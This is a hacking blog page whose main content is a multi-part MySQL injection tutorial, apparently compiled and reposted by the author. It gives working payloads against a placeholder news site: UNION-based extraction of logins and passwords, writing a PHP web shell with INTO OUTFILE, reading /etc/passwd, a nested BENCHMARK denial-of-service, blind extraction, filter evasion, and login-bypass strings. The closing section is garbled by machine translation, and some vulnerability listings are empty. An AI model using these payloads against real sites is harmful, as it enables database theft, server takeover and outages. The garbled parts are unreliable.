Hacking Equipments | C/C++ Coding | Updates
Showing posts with label Hacking Ebooks. Show all posts

[ ebook ] Beginner Guide to SSL Certificates by Symantec

Beginner Guide to SSL Certificates by Symantec



Here is a Beginner Guide to SSL Certificates from Symantec. As we all know how much we rely on encryption for security, we think you should learn about this too. Download it from the link below; the PDF explains the following:

  • Introduction
  • What is an SSL Certificate?
  • How Does SSL Encryption Work?
  • How Do I Know That a Site Has a Valid SSL Certificate?
  • Where Would I Use an SSL Certificate?
  • Different Types of SSL Certificate
  • Tech Talk Made Simple
  • Conclusion

Download :



It is placed on Google Drive; if any problem occurs, just let me know in the comments and I will add more download links.

MySQL injection Experts guide




Assalam-o-Alaikum,

If you want to learn from the beginning, you should read my complete series from the start.

I am completing my series on MySQL injection:



  1. Lesson 1 and 2: Intro and types of vulnerabilities
  2. Lesson 3: Learning about MySQL
  3. Lesson 4: Expert learning about MySQL




************************************786**************************************

In the previous article we covered the basics of MySQL (finding the column count and using UNION).

Finding tables and columns when INFORMATION_SCHEMA is not accessible

This is the ugly option: plain brute force of names. Example:

http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 FROM tbl_name --

Keep substituting guesses for tbl_name until the error message

mysql_query(): Table 'tbl_name' doesn't exist

goes away. Suppose that with the name Users the error disappears and the page renders exactly as it does for

http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 --

That means a table Users exists, so we move on to guessing its columns:

http://xxx/news.php?id=-1' UNION SELECT 1,2,3,column_name,5,6 FROM Users --

Keep substituting guesses for column_name until the error message

mysql_query(): Unknown column 'column_name' in 'field list'

goes away; no error means the column exists. This is how we learn that the Users table has the columns login and password.

Listing the data. Calling the script as

http://xxx/news.php?id=-1' UNION SELECT 1,2,login,password,5,6 FROM Users LIMIT 0,1 --

displays the login and password of the first row in Users. LIMIT offset,count skips offset rows, so LIMIT 1,1 gives the second row, LIMIT 2,1 the third, and so on through the whole table. (Remember that MySQL requires a space after --; in a URL send it as --+ or --%20, otherwise the trailing space is lost and the comment does not work.)



MySQL has an interesting feature, SELECT ... INTO OUTFILE, which writes the result of the query into a file on the database server. SELECT ... INTO DUMPFILE is almost the same (it writes a single row with no column or line terminators), and either can be used. Example:

http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 INTO OUTFILE '1.txt' --

What stops us from writing a web shell the same way? Put the PHP code into one of the columns instead of a number (the quoted string below is where it goes):

http://xxx/news.php?id=-1' UNION SELECT 1,2,3,' ',5,6 INTO OUTFILE '1.php' --

All that remains is to find the full path to the site's document root on the server and prepend it to 1.php. In principle you can trigger another error whose message reveals the path, or write the file somewhere outside the web root and pick it up with a local file include, but that is a different topic.

Limitations of INTO OUTFILE: the FILE privilege is required, the target file must not already exist (MySQL refuses to overwrite), the directory must be writable by the OS account MySQL runs under, and on newer servers the secure_file_priv variable restricts the directory files may be written to, or disables file export altogether (SHOW VARIABLES LIKE 'secure_file_priv' tells you which).



Reading files

Consider the function LOAD_FILE():

http://xxx/news.php?id=-1' UNION SELECT 1,2,LOAD_FILE('/etc/passwd'),4,5,6 --

There are several limitations here as well:
  • the file must be given by its full (absolute) path;
  • the FILE privilege is required;
  • the file must be on the database server itself (which is not necessarily the web server);
  • the file must be smaller than max_allowed_packet;
  • the file must be readable by the OS account under which MySQL runs;
  • as with INTO OUTFILE, secure_file_priv may restrict the directory or disable file access entirely.

If the function cannot read the file it returns NULL rather than an error, so an empty column means "not readable", not necessarily "does not exist".



**************

In most cases an SQL server gets DoSed because the attacker can do nothing else: couldn't find the tables or columns, has no privileges for them, and so on. I am honestly against this method, but still...

To the point. The BENCHMARK() function evaluates the same expression a given number of times:

SELECT BENCHMARK(100000, MD5(CURRENT_TIME));

This evaluates MD5(CURRENT_TIME) 100000 times, which takes about 0.7 seconds on my machine. Not much, it seems... but what if BENCHMARK is nested?

SELECT BENCHMARK(100000, BENCHMARK(100000, MD5(CURRENT_TIME)));

That is 100000 x 100000 = 10^10 MD5 computations in a single query. The DoS in our case:

http://xxx/news.php?id=-1' UNION SELECT 1,2,BENCHMARK(100000,BENCHMARK(100000,MD5(CURRENT_TIME))),4,5,6 --

Hitting F5 a hundred times is enough to tie up every connection and bring the server down.

**********

Character-by-character brute force (boolean-based blind injection)

We need this case when http://xxx/news.php?id=1 and http://xxx/news.php?id=0 give different pages (i.e. the page depends on which id is selected). If they do not differ this method is useless, but it is still worth finishing.

The query to the database is

SELECT * FROM news WHERE id='1'

Now we modify the vulnerable parameter id so that the query becomes

SELECT * FROM news WHERE id='-1' OR id=IF(ASCII((SELECT USER()))>=100,'1','0') -- ';

i.e. we request

http://xxx/news.php?id=-1' OR id=IF(ASCII((SELECT USER()))>=100,'1','0') --

MySQL first runs the subquery SELECT USER(), passes the result to ASCII(), which returns the code of the first character of the string, and then IF() returns '1' if that code is greater than or equal to 100 and '0' otherwise. So the overall query becomes either

SELECT * FROM news WHERE id='-1' OR id=1

which renders the page for news.php?id=1, or, if the code is less than 100,

SELECT * FROM news WHERE id='-1' OR id=0

which renders the page for news.php?id=0. We will say that the query "returns 1" (yes) or "returns 0" (no) accordingly, and start picking characters. SUBSTRING(str, pos, 1) selects the character at position pos (counting from 1), so the general probe is:

http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100,'1','0') --

Returned 1, so the code of the first character is >= 100. Try

http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=200,'1','0') --

Returned 0, so 100 <= code < 200.

http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=150,'1','0') --

Returned 0 again, so 100 <= code < 150.

http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=125,'1','0') --

Returned 0 once more, so 100 <= code < 125.

http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=113,'1','0') --

Returned 1, therefore 113 <= code < 125.

http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=118,'1','0') --

Returned 0, therefore 113 <= code < 118.

http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=115,'1','0') --

Returned 0, therefore 113 <= code < 115, i.e. the code is 113 or 114.

http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1))=113,'1','0') --

Returned 0, so the code is not 113.

http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1))=114,'1','0') --

Cheers! Returned 1, so the code is 114, which is the character "r". On to the next character:

http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),2,1))>=100,'1','0') --

and we repeat all the previous steps. Halving the interval each time (a binary search over 0..255) needs at most eight requests per character; ASCII('') is 0, so a character whose code comes out as 0 marks the end of the string.


**************************



What if there is no output field on the page and error reporting is off? The BENCHMARK() function comes to the rescue. As described above, it evaluates one expression many times. So what, you ask... Here is what. Recall the query

SELECT BENCHMARK(100000, BENCHMARK(100000, MD5(NOW())));

which takes a long time to finish. We use it as the "false" branch of IF() and again pick, character by character, the name of the user under which we are connected to the database (USER()):

http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100,1,BENCHMARK(2999999,MD5(NOW()))) --

The query becomes

SELECT * FROM news WHERE id='-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100,1,BENCHMARK(2999999,MD5(NOW()))) -- ';

and we pick the string USER() exactly as before. Only now, instead of returning 0, the query takes a very long time to complete: a long delay tells us the answer is 0, and a response without any delay tells us the answer is 1.

Now about the delay. To calibrate what "0" and "1" look like, make a few preliminary requests:

http://xxx/news.php?id=-1' OR id=IF(99>100,1,BENCHMARK(2999999,MD5(NOW()))) --

This always returns 0; measure how long it takes. Depending on the bandwidth of your connection, adjust the count 2999999 until you can reliably tell the delay apart from

http://xxx/news.php?id=-1' OR id=IF(101>100,1,BENCHMARK(2999999,MD5(NOW()))) --

which always returns 1 and should come back immediately.

Give the SQL server some time to rest after each BENCHMARK request, or your own probes queue up behind each other and skew the timing. On MySQL 5.0.12 and later, SLEEP(seconds) is a cleaner delay: its duration does not depend on how loaded the server's CPU is.



Using error reporting

This method relies on the "false" branch of IF() running a subquery that causes an error: an error message tells us the answer is 0, and its absence tells us the answer is 1. It helps when there is no output field on the page but error reporting is enabled (!).

SELECT * FROM news WHERE id='-1' OR id=(SELECT 1 UNION SELECT 2)

This query produces an error, because id is compared with a subquery that returns two rows:

mysql_query(): Subquery returns more than 1 row

That is the theory. Now the query we use to pick characters:

SELECT * FROM news WHERE id='-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100,1,(SELECT 1 UNION SELECT 2)) -- ';

As can be seen from this query, if the character code is greater than or equal to 100, IF() returns 1 and there are no errors; otherwise IF() evaluates the subquery

SELECT 1 UNION SELECT 2

which returns two rows, and comparing that with id causes an error, from which we understand that the query returned 0.

The big disadvantage of this method is that it fills the server logs with huge numbers of errors. The big advantage is speed.



Injection in ORDER BY

Many people believe that injection into an ORDER BY clause is a hopeless case. Well, we are going to change that view. Suppose the database query looks like this:

SELECT * FROM news ORDER BY $by

As usual the variable $by is not filtered, and the page displays several rows from the database. We need two requests that change the page in some visible way and whose outcome we can influence with a subquery. Two such requests are

http://xxx/news.php?by=id*1
http://xxx/news.php?by=id*-1

The first sorts the news in ascending order of id, the second in descending order (the sort key is negated). The request for brute-forcing the user name then looks like this:

http://xxx/news.php?by=id*IF(ASCII(SUBSTRING(USER(),1,1))=112,1,-1)

Result: the news came out in reverse order => false.

http://xxx/news.php?by=id*IF(ASCII(SUBSTRING(USER(),1,1))=113,1,-1)

Reverse order again => false.

http://xxx/news.php?by=id*IF(ASCII(SUBSTRING(USER(),1,1))=114,1,-1)

Aha! Normal order => true. Character code 114 is the character "r". Proceed to the next character, and so on. Note that no quote or comment is needed here: $by sits directly after ORDER BY, so the injected expression is simply part of the sort key.




*************************

So Now ,


WHAT TO DO IF SOMETHING IS FILTERED

First, recall that in SQL the construction /**/ is equivalent to a space, so it can stand in for spaces when they are filtered.

There is a useful function CHAR(), which returns the character for a given code. Suppose some character is filtered... let it be the asterisk (*). First we need to know the code of this character. MySQL has the function ASCII(), which returns the code of the leftmost character of the string passed to it, so we use

SELECT ASCII('*');

Doing this on the vulnerable host makes no sense (the character '*' is filtered); do it on a local MySQL. We learn that the code is 42 and use the CHAR() function like this:

SELECT CHAR(42,42,42);

which outputs three asterisks. Another way is to use the hexadecimal character codes. Now suppose that the string 'login' is filtered. MySQL has the function HEX(), which returns the hexadecimal representation of a string. It is used like this:

SELECT HEX('login');

This produces '6C6F67696E'; prefix it with "0x" (so that MySQL knows it is dealing with a hexadecimal literal) to get 0x6C6F67696E, which can be used without CHAR() like this:

SELECT 0x6C6F67696E FROM User;

or with CHAR() like this:

SELECT CHAR(0x6C,0x6F,0x67,0x69,0x6E) FROM User;

Both forms need no quotes at all, which is what makes them useful when the quote character itself is filtered or escaped.
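The three rewrites above (/**/ for spaces, 0x... hex literals and CHAR() for quoted strings) can be applied mechanically to a payload. The following Python helper is an added example, not code from the original post; the sample payloads and the sets of filtered characters in the usage are assumed for illustration.

```python
import re
from typing import Set

# A single-quoted SQL string literal without embedded quotes, e.g. 'login'.
_LITERAL_RE = re.compile(r"'([^']*)'")


def hex_literal(text: str) -> str:
    """'login' -> 0x6C6F67696E, a MySQL hex literal that needs no quotes."""
    return "0x" + text.encode("utf-8").hex().upper()


def char_literal(text: str) -> str:
    """'***' -> CHAR(42,42,42), the same string built from character codes."""
    return "CHAR(" + ",".join(str(b) for b in text.encode("utf-8")) + ")"


def rewrite(payload: str, filtered: Set[str], use_char: bool = False) -> str:
    """Rewrite `payload` so it contains none of the characters in `filtered`.

    Quoted literals are handled first: a literal is re-encoded (hex, or CHAR()
    when use_char is set) if the quote itself is filtered or the literal
    contains a filtered character. Then, if the space is filtered, every
    remaining space becomes /**/, which MySQL treats as whitespace. Anything
    still filtered after that (an operator such as =, parentheses, the commas
    inside CHAR()) cannot be hidden this way, so a ValueError is raised rather
    than returning a payload the filter would reject.
    """
    encode = char_literal if use_char else hex_literal

    def encode_literal(m: "re.Match[str]") -> str:
        body = m.group(1)
        if "'" in filtered or any(c in filtered for c in body):
            return encode(body)
        return m.group(0)

    out = _LITERAL_RE.sub(encode_literal, payload)
    if " " in filtered:
        out = out.replace(" ", "/**/")
    leftover = sorted(c for c in filtered if c in out)
    if leftover:
        raise ValueError(f"cannot remove filtered characters {leftover} from {out!r}")
    return out


if __name__ == "__main__":
    # assumed sample payload and filters, for demonstration only
    print(rewrite("UNION SELECT 1,'login' FROM users", {"'", " "}))
    print(rewrite("SELECT '***'", {"*"}, use_char=True))
```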


*******************************************************************************



Now I will explain another way of finding SQL injection: relying on the error messages a web application leaks, courtesy of developers who did not fully understand SQL injection.

LOOK!

The SQL error messages are very important. A site sends you back a verbose SQL error, and we read that message looking for clues. For example, suppose a site has a login form with user name and password fields, and we enter ' or 1=1 -- in them. If the site is vulnerable it gives an error such as:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'users' to a column of data type int.
/index.asp, line 11

That is how we get an error. It tells us that the back end is Microsoft SQL Server reached through ODBC, that our input reached the query unfiltered, that the failing page is /index.asp at line 11, and (from the failed conversion) that a string value 'users' was being compared with an integer column. The SQL query did not end where the developer expected it to.

The following can also be used as parameters:

' or 1=1 --
" or 1=1 --
' or 'a'='a
or 1=1 --
') or ('a'='a
" or "a"="a

We write ' or 1=1 -- in the user name and password fields because the condition becomes "login is empty OR 1=1", and 1=1 is always true, so the WHERE clause matches every row regardless of the credentials entered.



*****************************


USEFUL FUNCTIONS IN MYSQL

A short reference for the SQL used above

USER() - returns the account under which we are connected to MySQL (user@host)
DATABASE() - returns the name of the database we are connected to
VERSION() - returns the MySQL version
---------------------------- 

ASCII(str) - returns the ASCII code of the first character of the string "str"
CHAR(x1, x2, ...) - returns a string consisting of the characters with codes x1, x2, etc.
HEX(str) - returns the hexadecimal representation of the string "str"
---------------------------- 

LENGTH(str) - returns the length of the string "str" in bytes
SUBSTRING(str, pos [, len]) - returns the substring of "str" of length len (to the end of the string if len is omitted) starting at position pos (counting from 1)
LOCATE(substr, str [, pos]) - returns the position of the first occurrence of "substr" in the string "str", starting the search at position pos (from the beginning if omitted); returns 0 if "substr" does not occur in "str"
---------------------------- 

LOWER(str) - converts the string "str" to lower case (for non-Latin characters this depends on the character set)
CONCAT(param1, param2, ...) - joins the strings into one
CONCAT_WS(sep, param1, param2, ...) - joins the strings into one, separated by "sep"
---------------------------- 

IF(expr, ret1, ret2) - tests the condition expr: if it is true (not 0) returns ret1, otherwise returns ret2
---------------------------- 

expr BETWEEN min AND max - returns 1 if expr is greater than or equal to min and less than or equal to max, otherwise 0
---------------------------- 

AES_DECRYPT(AES_ENCRYPT('string', 'key'), 'key') - newer scripts often store values encrypted; with this pair of functions you can encrypt and decrypt them inside the query and need not bother with a separate tool.


**************************************************************



Comments in MySQL

# starts a comment in MySQL. Example:

SELECT pass, login FROM users # This is a comment
SELECT pass, login FROM users

-- is another form of comment in MySQL. A space (or other whitespace) is required after the two dashes. Example:

SELECT pass, login FROM users -- This is a comment

/* */ is the C-style comment in MySQL. Old MySQL versions accepted an unterminated comment (the closing part could be omitted); current versions report a syntax error for it, so test this on the target version. For MySQL the comment is equivalent to whitespace. Example:

SELECT pass, login FROM users /* This is a comment
SELECT pass, login /* This is a comment */ FROM users
SELECT/**/pass, login/**/FROM/**/users

/*!int */ is an extension of the previous comment. Everything enclosed in this comment is interpreted as part of the SQL query if the MySQL version number is greater than or equal to the number int after the exclamation mark (32302 means 3.23.02); other database engines treat it as an ordinary comment. Example:

SELECT pass /*!32302 , login */ FROM users


*************************


SQL Injection: (Fixed in vB 3.0.9)

> /joinrequests.php:
POST:

> /AdminCP/User.php:
GET:
GET:

> /AdminCP/usertitle.php:
GET:

> /AdminCP/usertools.php:
GET:

o XSS: (Fixed in vB 3.0.9)
=================================================================

> /AdminCP/css.php:
GET:

> /AdminCP/index.php:
GET:

> /AdminCP/User.php:
GET:

> /AdminCP/language.php:
GET:

> /AdminCP/modlog.php:
GET:

> /AdminCP/template.php:
GET:
GET:
GET:

o Arbitrary File Upload:

=================================================================

A user with access to the administrator panel (e.g. a (co-)administrator) and the privilege to add avatars / icons / smileys is able to upload arbitrary files. An attacker is thereby able to execute commands in the context of the web server.

> /AdminCP/image.php:
POST:
POST:
POST:



****************************


Getting a random record from a table

DECLARE @sql VARCHAR(500)  /* variable to hold our SQL statement */
DECLARE @rowCnt INT        /* how many records the table holds */
DECLARE @top INT           /* random offset of the record we will return */

SELECT @rowCnt = COUNT(*) FROM district        /* how many records our table has */
SELECT @top = CAST(RAND() * @rowCnt AS INT)    /* a random number in 0 .. @rowCnt-1 */

/* build the SQL statement that will fetch the random record */
SET @sql = 'SELECT TOP 1 tt.* FROM district tt
            WHERE tt.icKod NOT IN (SELECT TOP ' + CAST(@top AS VARCHAR) + ' icKod FROM district)'

EXEC (@sql)   /* run the generated statement and wait for the result */

I have a table with the following structure:

CREATE TABLE [dbo].[District] (
    [IcKod] [smallint] NOT NULL,
    [IcDesc] [varchar](16) COLLATE Turkish_CI_AS NULL
) ON [PRIMARY]

INSERT INTO district (IcKod, icDesc) VALUES (4, 'BAKIRKÖY');
INSERT INTO district (IcKod, icDesc) VALUES (3, 'BAHÇELİEVLER');
INSERT INTO district (IcKod, icDesc) VALUES (2, 'Bagcilar');
INSERT INTO district (IcKod, icDesc) VALUES (1, 'AVCILAR');
INSERT INTO district (IcKod, icDesc) VALUES (5, 'Bayrampasa');


********************************

Useful Commands In SQL Injection

Commands that are useful during an injection. This list is the PostgreSQL command reference; most of these also exist in MySQL and MSSQL, but LISTEN/NOTIFY, rewrite rules, CLUSTER and VACUUM are PostgreSQL-specific.

ABORT - abort the current transaction
ALTER DATABASE - change a database
ALTER GROUP - add users to a group or remove users from a group
ALTER TABLE - change the definition of a table
ALTER TRIGGER - change the definition of a trigger
ALTER USER - change a database user account
ANALYZE - collect statistics about a database
BEGIN - start a transaction block
CHECKPOINT - force a transaction log checkpoint
CLOSE - close a cursor
CLUSTER - cluster a table according to an index
COMMENT - define or change the comment of an object
COMMIT - commit the current transaction
COPY - copy data between files and tables
CREATE AGGREGATE - define a new aggregate function
CREATE CAST - define a user-defined cast
CREATE CONSTRAINT TRIGGER - define a new constraint trigger
CREATE CONVERSION - define a user-defined conversion
CREATE DATABASE - create a new database
CREATE DOMAIN - define a new domain
CREATE FUNCTION - define a new function
CREATE GROUP - define a new user group
CREATE INDEX - define a new index
CREATE LANGUAGE - define a new procedural language
CREATE OPERATOR - define a new operator
CREATE OPERATOR CLASS - define a new operator class for indexes
CREATE RULE - define a new rewrite rule
CREATE SCHEMA - define a new schema
CREATE SEQUENCE - define a new sequence generator
CREATE TABLE - define a new table
CREATE TABLE AS - create a new table from the results of a query
CREATE TRIGGER - define a new trigger
CREATE TYPE - define a new data type
CREATE USER - define a new database user account
CREATE VIEW - define a new view
DEALLOCATE - remove a prepared query
DECLARE - define a cursor
DELETE - delete rows of a table
DROP AGGREGATE - remove a user-defined aggregate function
DROP CAST - remove a user-defined cast
DROP CONVERSION - remove a user-defined conversion
DROP DATABASE - remove a database
DROP DOMAIN - remove a user-defined domain
DROP FUNCTION - remove a user-defined function
DROP GROUP - remove a user group
DROP INDEX - remove an index
DROP LANGUAGE - remove a user-defined procedural language
DROP OPERATOR - remove a user-defined operator
DROP OPERATOR CLASS - remove a user-defined operator class
DROP RULE - remove a rewrite rule
DROP SCHEMA - remove a schema
DROP SEQUENCE - remove a sequence
DROP TABLE - remove a table
DROP TRIGGER - remove a trigger
DROP TYPE - remove a user-defined data type
DROP USER - remove a database user account
DROP VIEW - remove a view
END - commit the current transaction
EXECUTE - execute a prepared query
EXPLAIN - show the execution plan of a statement
FETCH - retrieve rows from a table using a cursor
GRANT - define access privileges
INSERT - create new rows in a table
LISTEN - listen for a notification
LOAD - load or reload a shared library file
LOCK - explicitly lock a table
MOVE - position a cursor on a specified row of a table
NOTIFY - generate a notification
PREPARE - create a prepared query
REINDEX - rebuild corrupted indexes
RESET - restore the value of a run-time parameter to its default value
REVOKE - remove access privileges
ROLLBACK - abort the current transaction
SELECT - retrieve rows from a table or view
SELECT INTO - create a new table from the results of a query
SET - change a run-time parameter
SET CONSTRAINTS - set the constraint mode of the current transaction
SET SESSION AUTHORIZATION - set the session user identifier and the current user identifier of the current session
SET TRANSACTION - set the characteristics of the current transaction
SHOW - show the value of a run-time parameter
START TRANSACTION - start a transaction block
TRUNCATE - empty a table
UNLISTEN - stop listening for a notification
UPDATE - update rows of a table
VACUUM - garbage-collect and optionally analyze a database



That is the end of the MySQL part.

:P Now give your feedback, I want to see what the comments will be.

********************************



Regards,
Zulqurnain jutt

Learning about MySQL




Assalam-o-Alaikum,


Now I am going to complete my series:

  1. Lesson 1 and 2: Intro and types of vulnerabilities
  2. Lesson 3: Learning about MySQL
  3. Lesson 4: Expert learning about MySQL


*************************************786***************************************

Determining which columns are displayed

I think many of us are not satisfied with a page like

http://xxx/news.php?id=1

as it is. So we need the first part of the query (everything before the UNION) to return nothing. The easiest way is to change the "id" from '1' to '-1' (or to '9999999'):

http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 --

Now the page should display some of these numbers somewhere (for example, in a conventional news script you will see 3 in the "news title" and 4 in the "news body", and so on). Now that we know which positions are printed, wherever we need information we replace that number with the function we need. If the numbers do not show up anywhere, the remaining subsections of section 2.1 are skipped.

SQL injection + cross-site scripting

Example (the script payload goes into the quoted fourth column, which the page displays):

http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'



The rest will be shown in the next part of the series.


Regards,
Zulqurnain jutt

MySQL injection Full Book


                                 


Assalam-o-Alaikum,


Today we are going to learn about MySQL injection, a complete tutorial. Well, I say a complete book; I don't claim this tutorial was written entirely by me, but it was put together by me :p

It was originally written by attack.

*************************************786**************************************


I have made it a series so I can present it in focused pieces:

  1. Lesson 1 and 2: Intro and types of vulnerabilities
  2. Lesson 3: Learning about MySQL
  3. Lesson 4: Expert learning about MySQL




When you search the Internet for anything on SQL injection you usually come across either very short articles or ones that are not clear, and to grasp the subtleties of the subject you end up collecting bits from 10-20 articles. So I decided to write a complete FAQ on the topic. Those who find something missing or in the wrong place, please write below; it is hard to keep everything in mind. This is my first post, so please don't throw tomatoes.

I will not explain what SQL injection is; if you do not know, this article is probably not for you. Briefly: the attacker supplies input that becomes part of the query sent to the database, so that the query the database actually executes differs from the one the developer wrote.

Required for this article:

a) The presence of a brain :p
b) Straight hands
c) Knowledge of the SQL language

Basically this article is written for PHP + MySQL, but there are a few MSSQL examples.

In fact, the best way to learn SQL injection is not to read this article but to set up the scripts yourself and try the examples on your own machine; no article replaces that.

Each section builds on the previous one, so I recommend reading everything in order.

Unfortunately the article is split into several posts because it does not fit the 20,000-character limit.

1. Finding the injection. It is still pretty easy: in every field, variable and cookie we try inserting a single quote.


1.1 The first case

The script is

http://xxx/news.php?id=1

Suppose the original query to the database is:

SELECT * FROM news WHERE id='1';

Now we append a quote to the variable "id":

http://xxx/news.php?id=1'

If the variable is not filtered and error reporting is on, a message like this appears:

mysql_query(): You have an error in SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

because the query sent to the database is now:

SELECT * FROM news WHERE id='1'';

If error reporting is turned off we cannot tell anything from such a page, so we use the trick from section 1.4 (it does not hurt to use it anyway): append a comment after the quote:

http://xxx/news.php?id=1'; --

The query to the database becomes:

SELECT * FROM news WHERE id='1'; -- ';

(For those not following: "--" starts a comment and everything after it is discarded. MySQL requires a space after the two dashes, as the documentation says, so make sure one is sent, e.g. as --+ in the URL.) Thus for MySQL the query is effectively the same as before, and the page looks identical to

http://xxx/news.php?id=1

whereas id=1' on its own did not; that tells us the quote reached the query unescaped.


Let's look at some SQL.

SQL has the LIKE operator, which compares strings against a pattern. Suppose an authentication script, given a user name and password, runs this query:

Code:

SELECT * FROM users WHERE login LIKE 'admin' AND pass LIKE '123';

Even if the script escapes quotes, this is vulnerable. With LIKE the character "%" matches any string, so we simply enter "%" instead of the password, and the query becomes

Code:

SELECT * FROM users WHERE login LIKE 'admin' AND pass LIKE '%';

and we are logged in as admin. Strictly speaking we have not found an SQL injection here, but we have exploited the query all the same.

What if the authentication script does not escape quotes?

IMHO it would be foolish to use such an injection merely to pull data out. Let the database query be:

Code:

SELECT * FROM users WHERE login='admin' AND pass='123';

Unfortunately we do not know the password '123', but we found that the login parameter is injectable, and we want to log in as 'admin'. We enter something like admin'; -- as the login and anything at all as the password; the password check is commented out and the nickname 'admin' goes through:

SELECT * FROM users WHERE login='admin'; -- ' AND pass='123';

Now what if the vulnerability is in 'pass' instead? We enter 123' OR login='admin'; -- in the password field. The query will be:

Code:

SELECT * FROM users WHERE login='admin' AND pass='123' OR login='admin'; -- ';

which for the database is completely identical to this query:

Code:

SELECT * FROM users WHERE (login='admin' AND pass='123') OR (login='admin');

After these steps we are logged in as 'admin' with full access.
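The LIKE wildcard bypass and the quote-based bypasses above (plus the ' or 1=1 -- form from the MSSQL section) can be shown side by side with the fix. The following Python program is an added example, not code from the original post: it builds the login queries the text describes by string concatenation, then the parameterised version, against a constructed in-memory SQLite users table (the admin/123 and bob/hunter2 rows are made up for the demonstration). SQLite's LIKE wildcards, quoting and -- comments behave like MySQL's for these cases, which is why it can stand in for the PHP/MySQL back end.

```python
import sqlite3
from typing import List


def make_db() -> sqlite3.Connection:
    """Constructed users table standing in for the post's MySQL database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT, pass TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "123"), ("bob", "hunter2")])
    return db


def escape_quotes(s: str) -> str:
    """The only 'filter' the post assumes for the LIKE example: '' for '."""
    return s.replace("'", "''")


def login_like(db: sqlite3.Connection, login: str, password: str) -> List[str]:
    """Vulnerable: quotes are escaped, but LIKE still honours % and _ wildcards."""
    q = (f"SELECT login FROM users WHERE login LIKE '{escape_quotes(login)}' "
         f"AND pass LIKE '{escape_quotes(password)}'")
    return [row[0] for row in db.execute(q)]


def login_concat(db: sqlite3.Connection, login: str, password: str) -> List[str]:
    """Vulnerable: no escaping at all, the post's login='admin' AND pass='123' query."""
    q = f"SELECT login FROM users WHERE login = '{login}' AND pass = '{password}'"
    return [row[0] for row in db.execute(q)]


def login_param(db: sqlite3.Connection, login: str, password: str) -> List[str]:
    """Fixed: bound parameters and equality, so input can never alter the query."""
    q = "SELECT login FROM users WHERE login = ? AND pass = ?"
    return [row[0] for row in db.execute(q, (login, password))]


if __name__ == "__main__":
    db = make_db()
    print(login_like(db, "admin", "%"))                          # wildcard password
    print(login_concat(db, "admin' -- ", "wrong"))               # comment out the password check
    print(login_concat(db, "admin", "x' OR login='admin' -- "))  # injection in the password
    print(login_concat(db, "' OR 1=1 -- ", "x"))                 # every row matches
    print(login_param(db, "admin", "%"), login_param(db, "admin", "123"))
```

Each vulnerable function returns the logins the query matched; a login form that takes the first row logs the attacker in as admin in every case, and the ' OR 1=1 -- payload returns the whole table. The parameterised version treats % and the quote as ordinary characters of the password, so only the real credentials match.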

Back to the news script. Remember that in SQL, numeric parameters do not have to be quoted, so for

http://xxx/news.php?id=1

the query to the database may look like this:

SELECT * FROM news WHERE id=1;

In this case appending a quote to the 'id' parameter produces the same kind of error message, so detecting the injection is no different:

mysql_query(): You have an error in SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

When such a message pops up, the parameter is not filtered. To check that the parameter really is unquoted, enter

http://xxx/news.php?id=1 bla-bla-bla

The database does not understand what "bla-bla-bla" is and reports an error such as:

mysql_query(): You have an error in SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'bla-bla-bla' at line 1

If error reporting is turned off, check with

http://xxx/news.php?id=1; --

which should look exactly like

http://xxx/news.php?id=1

(the comment swallows the rest of the query, whereas id=1' returned an error or an empty page).

Next we make things harder for ourselves: the vulnerability from section 1.1 will now be used not only to break the query but to read data through it.

To begin with, the most useful thing (for those who can't be bothered to Google it) is the UNION command. Modify the request:

http://xxx/news.php?id=1' UNION SELECT 1 --

The query to the database becomes:

Code:

SELECT * FROM news WHERE id='1' UNION SELECT 1 -- ';

Unless the news table happens to have a single column, the number of columns before and after the UNION differs, and we run into this error:

mysql_query(): The used SELECT statements have a different number of columns

In this case we need to find the number of columns, so that the counts before and after UNION match. We do it like this:

http://xxx/news.php?id=1' UNION SELECT 1,2 --

Error: "The used SELECT statements have a different number of columns"

http://xxx/news.php?id=1' UNION SELECT 1,2,3 --

Error again

http://xxx/news.php?id=1' UNION SELECT 1,2,3,4,5,6 --

Aha! The page renders, just like http://xxx/news.php?id=1. So the query selects 6 columns.

But this method is based on the selection of the number of fields with GROUP BY. This type of request:

_http: / / xxx / news.php? id = 1 'GROUP BY 2 -

The number of these fields are less than or equal to 2 is not displayed.
Making such a request:

_http: / / xxx / news.php? id = 1 'GROUP BY 10 -

Oops ... There was an error mode.

mysql_query (): Unknown column '10 group statement 'in'

Then the column is less than 10 people. Divide by 2 to 10. And a request

_http: / / xxx / news.php? id = 1 'GROUP BY 5 -

Ooops error column number greater than or equal to 5, but that means 10 less. As it turns out 7 is the mean value from 5 to 10 now. Making a request:

_http: / / xxx / news.php? id = 1 'GROUP BY 7 -

another error ...

Another mismysql_query (): Unknown column '7 group statement 'in'

